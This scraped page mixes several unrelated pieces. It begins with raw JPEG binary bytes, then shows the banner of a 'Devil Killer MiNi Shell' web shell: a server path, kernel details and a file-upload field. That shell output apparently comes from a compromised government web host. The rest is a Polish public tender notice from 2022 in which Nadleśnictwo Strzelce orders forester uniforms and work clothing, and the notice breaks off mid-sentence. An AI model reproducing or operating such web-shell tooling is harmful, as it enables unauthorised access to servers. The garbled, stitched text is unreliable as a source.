JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20220321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20220321/0009229201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa umundurowania leśnika oraz środków ochrony indywidualnej odzieży i obuwia roboczego dla pracowników Nadleśnictwa Strzelce w 2022 roku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Nadleśnictwo Strzelce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 110016906</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Grabowiecka 20A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Hrubieszów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">82 568 32 10</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">strzelce@lublin.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://strzelce.lublin.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa umundurowania leśnika oraz środków ochrony indywidualnej odzieży i obuwia roboczego dla pracowników Nadleśnictwa Strzelce w 2022 roku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d71b95a2-a8ec-11ec-80f8-1ad70aec7fa4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00092292</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w niniejszym postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.Wymagania techniczne iorganizacyjne wysłania i odbierania dokumentów elektronicznych, cyfrowego odwzorowania dokumentów w postaci papierowej(elektronicznych kopii dokumentów stworzonych w postaci papierowej) oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP. .Ofertę sporządza się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.Sposób sporządzenia i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów <br/>z dnia 30.12.2021 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., 2452).<br/>Komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniportalu https://miniportal.uzp.gov.pl/ ePUAPu https://epuap.gov.pl/wps/portal oraz poczty elektronicznej strzelce@lublin.lasy.gov.pl z zastrzeżeniem, że złożenie oferty następuje wyłącznie przy użyciu miniportalu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku <br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE L 119 z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający informuje, iż administratorem danych osobowych jest Nadleśnictwo Strzelce. W sprawach dotyczących przetwarzania danych osobowych można skontaktować się za pośrednictwem poczty elektronicznej pod adresem strzelce@lublin.lasy.gov.pl lub telefonicznie pod numerem 82 568 32 10.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">S.270.3.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 173414 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 140987 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem pierwszej części zamówienia jest dostawa:<br/>sortów mundurowych leśnika wykonanych według wzorów określonych w:<br/>a) Zarządzenie nr 7 Dyrektora Generalnego Lasów Państwowych z dnia 20 stycznia 2022r. w sprawie wzorca oraz zasad i norm użytkowania mundurów leśnika dla pracowników Lasów Państwowych (Zn.EZ.241.1.2022),<br/>b) Rozporządzeniu Ministra Środowiska z dnia 19 grudnia 2017 r. w sprawie wzorów<br/>mundurów leśnika i oznak dla osób uprawnionych do ich noszenia. (Dz. U. poz. 2466 z<br/>późn. zm.),<br/>c) Zarządzeniu nr 50 Dyrektora generalnego Lasów Państwowych z dnia 18 grudnia 2017 r.<br/>w sprawie zmiany Zarządzenia nr 62 Dyrektora generalnego Lasów Państwowych z<br/>dnia 15 lipca 2013 r. w sprawie wzorca oraz zasad i norm użytkowania mundurów leśnika<br/>przez pracowników Lasów Państwowych,<br/>d) Zarządzeniu nr 16 Dyrektora Generalnego Lasów Państwowych z dnia 14 marca 2005<br/>r. w sprawie zmian w dokumentacji techniczno – technologicznej dla niektórych<br/>przedmiotów mundurów leśnika,<br/>e) Zarządzeniu nr 44 Dyrektor Generalnego Lasów Państwowych z dnia 14 maja 2012<br/>r. w sprawie zmian w dokumentacji techniczno – technologicznej dla niektórych<br/>przedmiotów mundurów leśnika,<br/>f) Zarządzeniu nr 54 Dyrektor Generalnego Lasów Państwowych z dnia 6 lipca 2012<br/>r. w sprawie zmiany Zarządzenia nr 44 Dyrektora Generalnego Lasów Państwowych z<br/>dnia 14 maja 2012 r. w sprawie zmian w dokumentacji techniczno – technologicznej dla<br/>niektórych przedmiotów mundurów leśnika.<br/>Powyższe akty prawne oraz dokumentacja techniczno-technologiczna mundurów leśnika<br/>oraz fotograficzna dokumentacja sortów są dostępne na stronie internetowej Ośrodka<br/>Rozwojowo- Wdrożeniowego Lasów Państwowych w Bedoniu:<br/> wykaz oraz teksty aktów prawnych dotyczących sortów mundurowych jest dostępny<br/>pod linkiem: http://www.bedon.lasy.gov.pl/akty-prawne#.VPAXNeH1qes<br/> szczegółowy opis wymagań dotyczących przedmiotu zamówienia zawiera<br/>dokumentacja techniczno – technologiczną oraz dokumentację fotograficzną<br/>zamieszczono na stronie internetowej<br/> http://www.bedon.lasy.gov.pl/dokumentacja-techniczno-technologiczna<br/> http://www.bedon.lasy.gov.pl/fotograficzna-dokumentacja-sortow-mundurowych<br/>Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2A do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 78511 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">18000000-9 - Odzież, obuwie, artykuły bagażowe i dodatki</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">18100000-0 - Odzież branżowa, specjalna odzież robocza i dodatki</p> <p class="mb-0">18200000-1 - Odzież wierzchnia</p> <p class="mb-0">18300000-2 - Części garderoby</p> <p class="mb-0">18400000-3 - Odzież specjalna i dodatki</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> . Zamawiający jest uprawniony zlecić Wykonawcy dodatkowy zakres rzeczowy obejmujący<br/>dostawy analogiczne, jak opisane w opisie przedmiotu zamówienia (dalej: „Opcja”).<br/>Zamawiający nie jest zobowiązany do zlecenia dostaw objętych przedmiotem Opcji, a<br/>Wykonawcy nie służy roszczenie o ich zlecenie. Dostawy będące przedmiotem Opcji mogą<br/>zostać zlecone na wartość do 20 % wartości netto przedmiotu zamówienia określonej zgodnie<br/>ze wzorem umowy, stanowiącym załącznik nr 9 do SWZ. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2.Przedmiotem drugiej części zamówienia jest dostawa:<br/>odzieży roboczej, obuwia roboczego oraz środków ochrony indywidualnej wykonanych<br/>zgodnie z:<br/>a) Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/425 z dnia 9 marca 2016 r.<br/>w sprawie środków ochrony indywidualnej;<br/>b) Ustawą z dnia 30 sierpnia 2002 r. o systemie oceny zgodności (Dz. U. z 2019 r. poz. 155);<br/>c) Rozporządzeniem Ministra Gospodarki z dnia 21 grudnia 2005 r. w sprawie zasadniczych<br/>wymagań dla środków ochrony indywidualnej (Dz. U. Nr 259, poz. 2173 z późn. zm.);<br/>d) Protokołem dodatkowym nr 24 do Ponadzakładowego Układu Zbiorowego Pracy dla<br/>Pracowników Państwowego Gospodarstwa Leśnego Lasy Państwowe, zawartego dnia 25<br/>stycznia 1998 r. i wpisanego do Rejestru Ponadzakładowych Układów Zbiorowych Pracy<br/>pod numerem U - XLIII, zawartym dnia 25 listopada 2014 roku.<br/>e) wzorami określonymi w Polskich Normach tj. m. in. odzież ochronna i robocza dostarczona<br/>dla Pracowników Lasów Państwowych musi posiadać atesty odpowiednie parametry<br/>techniczne, zapewnić bezpieczne wykonywanie czynności związanych z procesem pracy i<br/>musi być oznaczone symbolem (CE) zgodnie z przepisami.<br/>Szczegółowy opis odzieży bhp zawierają normy:<br/> odzież ochronna - wymagania ogólne PN - EN 13688:2013-12,<br/> środki ochrony indywidualnej - obuwie bezpieczne EN ISO 20345:2012,<br/> obuwie ochronne EN ISO 20346:2007/A1:2008,<br/> środki ochrony indywidualnej - obuwie zawodowe EZ ISO 20347:2012,<br/> odzież ochronna- ochrona przed deszczem EN 343:2003+A1:2007/ AC:2009 (PN – EN<br/>343+A1:2008/AC:2010),<br/> odzież ochronna- ochrona przed zimnem EN 342:2017 (PN-EN 342:2018-01),<br/> odzież ochronna wyroby odzieżowe chroniące przed chłodem – PN-EN 14058:2018-02<br/>Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2B do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 62476 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">35113400-3 - Odzież ochronna i zabezpieczająca</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">18100000-0 - Odzież branżowa, specjalna odzież robocza i dodatki</p> <p class="mb-0">18200000-1 - Odzież wierzchnia</p> <p class="mb-0">18400000-3 - Odzież specjalna i dodatki</p> <p class="mb-0">18800000-7 - Obuwie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> . Zamawiający jest uprawniony zlecić Wykonawcy dodatkowy zakres rzeczowy obejmujący<br/>dostawy analogiczne, jak opisane w opisie przedmiotu zamówienia (dalej: „Opcja”).<br/>Zamawiający nie jest zobowiązany do zlecenia dostaw objętych przedmiotem Opcji, a<br/>Wykonawcy nie służy roszczenie o ich zlecenie. Dostawy będące przedmiotem Opcji mogą<br/>zostać zlecone na wartość do 20 % wartości netto przedmiotu zamówienia określonej zgodnie<br/>ze wzorem umowy, stanowiącym załącznik nr 9 do SWZ. Ewentualna dostawa analogicznych artykułów w ramach prawa opcji będzie odbywać się w ramach umowy zawartej z wykonawcą wybranym w niniejszym postępowaniu. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Najkorzystniejsza oferta może uzyskać maksymalnie 100 punktów.<br/>2. Oferty będą oceniane na podstawie następujących kryteriów:<br/>Cena za realizację zamówienia (brutto) - waga 60%<br/>Okres gwarancji – waga 40%<br/>1) Ocena punktowa wg. kryterium „CENA” dokonana zostanie zgodnie z poniższym<br/>wzorem:<br/>najniższa oferowana cena<br/>C = ---------------------------------- x 100 pkt x 60%<br/>cena rozpatrywanej oferty<br/>2) Ocena punktowa wg. kryterium „Okres gwarancji”: Maksymalną ilość punktów w<br/>kryterium „Okres gwarancji” (40 punktów) otrzymuje Wykonawca, który zobowiąże<br/>się udzielić gwarancji na 24 miesięcy. Ocena punktowa dokonana zostanie zgodnie z<br/>poniższym wzorem:<br/>gwarancja oferty ocenianej – gwarancja minimalna<br/>G = ---------------------------------------------------------------------- x 100 pkt x 40%<br/>gwarancja maksymalna – gwarancja minimalna</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> dla części nr 1: Dostawa sortów mundurowych leśnika dla pracowników<br/>Nadleśnictwa Strzelce w 2022 r.<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca udokumentuje wykonanie w<br/>okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których<br/>dostawy zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających,<br/>czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz<br/>którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub<br/>ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń<br/>powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty<br/>potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3<br/>miesięcy, o wartości nie mniejszej niż 80 000 złotych brutto (osiemdziesiąt tysięcy zł),dla części zamówienia nr 2: Dostawa odzieży roboczej, obuwia roboczego oraz<br/>środków ochrony indywidualnej dla pracowników Nadleśnictwa Strzelce w 2022 r.<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca udokumentuje wykonanie w<br/>okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których<br/>dostawy zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających,<br/>czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz<br/>którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub<br/>ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń<br/>powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty<br/>potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3<br/>miesięcy, o wartości nie mniejszej niż 80 000 złotych brutto (osiemdziesiąt tysięcy zł), <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia spełnienia przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej , w zakresie doświadczenia Zamawiający żąda złożenia :<br/>a) wykazu dostaw wykonanych, a w przypadku świadczeń powtarzających się lub<br/>ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat<br/>wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są<br/>wykonywane, oraz załączeniem dowodów określających, czy te dostawy zostały<br/>wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy<br/>zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych 